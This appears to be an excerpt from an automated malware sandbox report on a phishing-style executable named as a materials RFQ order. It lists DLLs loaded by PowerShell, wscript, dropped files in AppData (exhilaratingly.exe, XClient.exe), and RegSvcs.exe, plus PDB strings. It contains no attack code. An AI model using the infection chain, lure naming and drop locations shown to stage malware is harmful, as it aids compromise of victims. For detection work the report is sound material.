Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Static file information: File size 1840128 > 1048576

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221869185.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2099214565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbdo source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ?'oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @'o.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbW source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
